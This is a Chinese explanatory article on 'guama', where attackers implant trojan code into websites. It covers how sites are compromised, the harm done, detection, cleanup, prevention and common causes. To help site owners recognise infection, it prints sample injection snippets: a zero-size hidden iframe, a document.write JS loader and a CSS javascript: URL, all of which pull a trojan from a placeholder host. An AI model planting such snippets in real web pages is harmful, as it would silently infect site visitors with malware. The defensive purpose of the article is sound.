基本信息
名詞解釋
所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感檔案掃描,伺服器漏洞,網站程式0day, 等各種方法獲得
網站管理員賬號,然後登入網站後台,通過資料庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過
弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入
惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。
危害
很多遊戲網站被掛馬,黑客目的就是盜取瀏覽該網站玩家的遊戲賬號,而那些大型網站被掛馬,則是為了蒐集大量的
肉雞。網站被掛馬不僅會讓自己的網站失去信譽,丟失大量客戶,也會讓我們這些普通用戶陷入黑客設下的陷阱,淪為黑客的肉雞。
如果不小心進入了已被掛馬的網站,則會感染木馬病毒,以致丟失大量的寶貴檔案資料和賬號密碼,其危害極大。
分辨
其實我們說的所謂的掛馬一般就是在那些可編輯檔案下或是頭部加入一段代碼來實現跳轉到別的網站訪問那個他們指定的HTML網頁木馬的然後通過你電腦本身的漏洞攻破你的系統給你下載一個下載者,然後那下載者設定多少時間後開始在指定地點隱藏下載木馬並運行!所以說我們只要把那段代碼給清理掉了就達到了清理掛馬的作用了!所以我們首先要辨別是不是自己的站是不是被掛馬!你如果打開網站發現很卡但是防毒軟體沒報警別以為沒事了,很多馬很有可能做了免殺處理所以殺軟沒反映!我們打開網站點查看
原始碼如果頂部或是底下出現了這樣的代碼就恭喜你中標了!比如:
<iframe src=http: //www.baidu/muma.html width=0 height=0></iframe>
我想學做站的人都知道這行代碼的意思吧?就是插入一個長和高都是0框架運行
http: //www.baidu/muma.html這個頁面!但是因為框架的長和高都是零你就沒辦法看到那個視窗了!但是如果你沒在頂部和底部發現這些代碼就以為沒事了,有的人還會在中間插入,只是在底部和頂部絕對不會影響到網站的整體結構不用想那么多!但是如果那個掛馬的哥們稍微耐心一點多測試一下在
網站代碼的中間還是很容易的!所以如果你代碼太多嫌找著麻煩的話你就可以直接在
IE瀏覽器里點查看--隱私里看到底有沒有外連到別的站上去的站!有的話那很有可能被掛馬了!(PS:如果你的站採集了的別人的圖片的話在隱私里會有連到別人那的喔,或是統計代碼也是,所以這要自己分析,哪些是正常的,哪些不是)!有的童鞋可能會說你這人真笨怎么不知道在
源檔案里直接查找<iframe這個呢!這樣快多了,但是我想說的是不是所有人都是用插入框架的方法掛馬的,方法可是有很多的喔,我就給大家列舉一下比如:
1 、js檔案掛馬
首先將以下代碼
document.write("<iframe width='0' height='0'
src='http //www.baidu/muma.htm'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
2、css中掛馬
body {
background-image: url('javascript:document.write("<script
src=http: //www.baidu/muma.js></script>")')}
恢復
恢復措施:1.整站被掛馬,最快速的恢複方法是,除開資料庫、上傳目錄之外,替換掉其他所有檔案;
2.仔細檢查網站上傳目錄存放的檔案,很多木馬偽裝成圖片保存在上傳目錄,你直接把上傳資料夾下載到本地,用
縮略圖的形式,查看是不是圖片,如果不顯示,則一律刪除;
3.資料庫裡面存在木馬,則把資料庫的木馬代碼清除!可以採用查找替換;
4.如果網站源檔案沒有,則需要FTP下載網站檔案,然後再DW裡面,用替換清除的方式一個個清除,注意網站的木馬數,如果被掛了很多不同的,必須多多檢查!
預防
措施 :
1、建議用戶通過ftp來上傳、維護網頁,儘量不安裝asp的上傳程式。
2、對asp上傳程式的調用一定要進行身份認證,並只允許信任的人使用上傳程式。
這其中包括各種新聞發布、商城及論壇程式,只要可以上傳檔案的asp都要進行身份認證!
3、asp程式管理員的用戶名和密碼要有一定複雜性,不能過於簡單,還要注意定期更換。
4、到正規網站下載asp程式,下載後要對其資料庫名稱和存放路徑進行修改,資料庫檔案名稱稱也要有一定複雜性。
5、要儘量保持程式是最新版本。
6、不要在網頁上加注後台管理程式登入頁面的連結。
7、為防止程式有未知漏洞,可以在維護後刪除後台管理程式的登入頁面,下次維護時再通過ftp上傳即可。
8、要時常備份資料庫等重要檔案。
9、日常要多維護,並注意空間中是否有來歷不明的asp檔案。記住:一分汗水,換一分安全!
10、一旦發現被入侵,除非自己能識別出所有木馬檔案,否則要刪除所有檔案。
11、定期對網站進行安全的檢測,具體可以利用網上一些工具,如億思網站安全檢測平台。
原因分析
簡述
一般來說,伺服器或者網站被植入病毒代碼有以下三種原因:
網站代碼、入侵導致、病毒導致
網站代碼
如果伺服器上大部分用戶的網站都正常,只有少量用戶網站被黑,那么就很可能是少量用戶網站被黑的網站代碼有問題,存在安全漏洞造成的。造成這個問題是沒有辦法解決,也不是服務商的責任。
大家都知道,“虛擬主機提供商”對自己的每個虛擬主機用戶都分配了FSO檔案操作的許可權,他們通過您分配的合法許可權,可以任意改動和上傳的任何檔案。如果用戶沒有保護好您分配給他們的合法許可權,令黑客有機可乘,那么,黑客就可以利用合法許可權對網站進行破壞了,但是大部分用戶都認為這個黑客入侵不是他自己造成的,是服務商造成的,這實際上是冤枉了服務商。
入侵導致
當伺服器上所有網站都被植入了病毒代碼,並且可以在源檔案的尾部或頭部找到病毒代碼檔案,或者在IIS裡面被植入了添加腳本,就標明是由於伺服器被入侵導致的。
病毒導致
當伺服器上所有網站都被植入了病毒代碼,並且在源檔案的尾部或頭部無法找到病毒代碼檔案,就表明伺服器所在的機房中了ARP病毒。這時需要聯繫我們來解決,一般情況下,機房會有大量伺服器中毒,會有很多客戶向機房反應,一般在半小時內機房就會處理的。